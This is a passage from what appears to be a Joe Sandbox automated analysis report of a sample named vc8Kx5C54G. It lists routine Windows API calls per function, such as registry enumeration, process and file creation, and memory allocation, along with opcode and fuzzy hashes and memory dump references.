                                                    • Opcode ID: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                    • Instruction ID: 990e0cae6f69a79882f0940071147895bcf3dc4f71101f62f717fb2ce75f629c
                                                    • Opcode Fuzzy Hash: 1699f4068c0c5867e7106ba40e3d9973070bda02754bb9a23a09a502d1616ce7
                                                    • Instruction Fuzzy Hash: FD517074A101008BCB21EF26E98169637B9EF94308B50C57BA8499F367C778ED46CB9D
                                                    APIs
                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DF64
                                                    • RegCloseKey.ADVAPI32(?,0042DFD5,?,00000000,00000000,00000000,00000000,00000000,0042DFCE,?,?,00000008,00000000,00000000,0042DFFB), ref: 0042DFC8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseEnum
                                                    • String ID:
                                                    • API String ID: 2818636725-0
                                                    • Opcode ID: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                    • Instruction ID: c872a63f9528d4f9380aaceb5e2d891e8c563da0940016be03c3acb485ce214c
                                                    • Opcode Fuzzy Hash: 9f8261b046af4c0305013da9979aadb613cc1e3f6400fb4ebe2b883e54c4606e
                                                    • Instruction Fuzzy Hash: A8319370F04258AEDB11DFA6DD42BBFBBB9EB49304F92447BE401E6281D6385E01CA1D
                                                    APIs
                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452810
                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00458098,00000000,00458080,?,?,?,00000000,00452836,?,?,?,00000001), ref: 00452818
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 2919029540-0
                                                    • Opcode ID: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                    • Instruction ID: e9b66965f7ed38539142cc2995e542ed63b4c0771d7d6ba66a5e4ac3981b0267
                                                    • Opcode Fuzzy Hash: e0555b4cbc397befea5ce91cbbea4dedbfe526bfc705885143054cd240055755
                                                    • Instruction Fuzzy Hash: 70113C72604608AF8B50DEADDD41D9FB7ECEB4D310B114567FD18D3241D674AD148BA8
                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFDA
                                                    • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B137,00000000,0040B14F,?,?,?,00000000), ref: 0040AFEB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindFree
                                                    • String ID:
                                                    • API String ID: 4097029671-0
                                                    • Opcode ID: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                    • Instruction ID: aeeba5ce467f8effdb78304bcd792b874f75604bed8582862ca5d9c37e282381
                                                    • Opcode Fuzzy Hash: bd4d08f36a9d4a560adef0fa1bde098128f2b715f965cb3459cef9598ac6c158
                                                    • Instruction Fuzzy Hash: CE01DF71700700AFDB14EF65AC92A1B77ADDB4A714B11807AF400AB3D1DA39AC019AA9
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                    • 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: A25940CurrentThread
                                                    • String ID:
                                                    • API String ID: 2655091166-0
                                                    • Opcode ID: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                    • Instruction ID: ec06e6b8def62778297c6a117e91140491810bf1675edd7fb5fc45fb14f34894
                                                    • Opcode Fuzzy Hash: b000ad2c2d45302efb537f6ed51b85bb3a5cc49cf8a353236d3522148df1097f
                                                    • Instruction Fuzzy Hash: D9015B76A04604BFD706CF6BDC1199ABBE8E789720B22887BEC04D3690E6355810DF18
                                                    APIs
                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 00452C96
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00452CBC), ref: 00452C9E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastMove
                                                    • String ID:
                                                    • API String ID: 55378915-0
                                                    • Opcode ID: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                    • Instruction ID: 72322736c602c8c7a1920fbe291f5aeb87443d44c1116871956ce6e3077d7411
                                                    • Opcode Fuzzy Hash: 4b3f53bb71bbb3de239a758d95ad3dd7b2750d400091be83cb52db7a615a65e0
                                                    • Instruction Fuzzy Hash: C9012671B00604AB8B01EB799D4189EB7ECDB4A32575045BBFC14E3343EA784E04456C
                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527A3), ref: 0045277D
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004527A3), ref: 00452785
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID:
                                                    • API String ID: 1375471231-0
                                                    • Opcode ID: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                    • Instruction ID: e798b8fcaf2c893210dd6dd972d3083c0fc79cae1e6532b7171fe4e83a13409b
                                                    • Opcode Fuzzy Hash: 9ee879c615aac4fee22e4c99406f95e71c245cbd6d77cc6155be40721354894d
                                                    • Instruction Fuzzy Hash: E1F02871A04604BFCB00EF759E4159EB3E8DB0E721B1045B7FC04E3242E7B94E048598
                                                    APIs
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00423241
                                                    • LoadCursorA.USER32(00000000,00000000), ref: 0042326B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CursorLoad
                                                    • String ID:
                                                    • API String ID: 3238433803-0
                                                    • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                    • Instruction ID: 59516fef74be350ba7f17c0e511b54e8d6c2303d910d3728eb6a55db14448276
                                                    • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                    • Instruction Fuzzy Hash: 68F0271170421066D6109E3E6CC0A6B72A8DF82335B71037BFB3EC72D1CA2E1D414569
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLibraryLoadMode
                                                    • String ID:
                                                    • API String ID: 2987862817-0
                                                    • Opcode ID: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                    • Instruction ID: aa33dc687cd71512c069df69893670fc4fcbad3b08ca7d4395289e8ee6212cdb
                                                    • Opcode Fuzzy Hash: 5e1e313bdd13d7489a01f7e50f084508f9c5c97fde52d832d9963c9b8019f2bb
                                                    • Instruction Fuzzy Hash: 13F08270714B44BFDB019F779CA282BBBECEB49B1179249B6FD00A3691E53C5910C928
                                                    APIs
                                                    • GetClassInfoA.USER32(00400000,?,?), ref: 004162D9
                                                    • GetClassInfoA.USER32(00000000,?,?), ref: 004162E9
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID:
                                                    • API String ID: 3534257612-0
                                                    • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                    • Instruction ID: 6cd5cb93a67b39dfae17eda9b7884797c0ece5161c54fd1178b0752c2523ee83
                                                    • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                    • Instruction Fuzzy Hash: C7E01AB26015146EE710DFA89D81EE73BDCDB08350B2201B7FE08CB246D3A4DD008BA8
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508E2
                                                    • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046FF69,?,00000000), ref: 004508EA
                                                      • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FilePointer
                                                    • String ID:
                                                    • API String ID: 1156039329-0
                                                    • Opcode ID: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                    • Instruction ID: 7f4ce0808efc90522886b7fd4f7afe0cb5ca5dcd319eb65f5abb6fc959a7204b
                                                    • Opcode Fuzzy Hash: b81912fe9410729738c8cc3b4427c31e6f6ea190abe7f97a6bc74282f8b5003d
                                                    • Instruction Fuzzy Hash: BDE012A93542005FE700FA7589C1F2B22DCDB44315F00846AF945CA183D678CC054B69
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                    • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                    • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                    • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                    APIs
                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408702), ref: 004085EB
                                                      • Part of subcall function 00406DDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406DF9
                                                      • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                    • String ID:
                                                    • API String ID: 1658689577-0
                                                    • Opcode ID: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                    • Instruction ID: bd6209dc85efa73f9a721b4ecfe58d49d0953a842630d38ee12c0cb785ae99e6
                                                    • Opcode Fuzzy Hash: e0f2d7fee364d4b50c904546fee583fee48e6df64a24fbccf64ec24177fbbbf9
                                                    • Instruction Fuzzy Hash: 1E314075E0011D9BCB01EF95C8819EEB779EF84314F518577E819BB386E738AE018B98
                                                    APIs
                                                    • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC31
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoScroll
                                                    • String ID:
                                                    • API String ID: 629608716-0
                                                    • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                    • Instruction ID: d0a12eb0c5d8f31e5c98d8a2781f1eb62c39d12b06d2a108fd5dac4500059ce8
                                                    • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                    • Instruction Fuzzy Hash: C02130B16087466FC340DF39C5447A6BBE4BB88304F04893EA498C3741E778E996CBD6
                                                    APIs
                                                      • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                      • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                    • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C2CE,?,00000000,?,?,0046C4E0,?,00000000,0046C554), ref: 0046C2B2
                                                      • Part of subcall function 0041EF50: IsWindow.USER32(?), ref: 0041EF5E
                                                      • Part of subcall function 0041EF50: EnableWindow.USER32(?,00000001), ref: 0041EF6D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                    • String ID:
                                                    • API String ID: 390483697-0
                                                    • Opcode ID: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                    • Instruction ID: 435c92a82c98609a262d66890dafa743f24e5c1e823ccadb8e8beb41f7667319
                                                    • Opcode Fuzzy Hash: 1950fa63623794e8b6cf7dfe712e88d918e2b7d9557fc3b7505cef75313acc34
                                                    • Instruction Fuzzy Hash: 95F059B1288300BFE7049BF2ECA6B2577E9E318720F510477F904821C0E5B95800C51E
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                    • Instruction ID: bbd698397dbc8f39e4f55c310c3945233451addb9156919cc96357002ab2f652
                                                    • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                    • Instruction Fuzzy Hash: 66F06271614109DBBB1CCF58D1519AF7BA0EB44310B20406FF907C7BA0E6346E90DA58
                                                    APIs
                                                    • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 0041657D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                    • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                    • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                    • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149E7
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                    • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                    • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                    • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507D8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
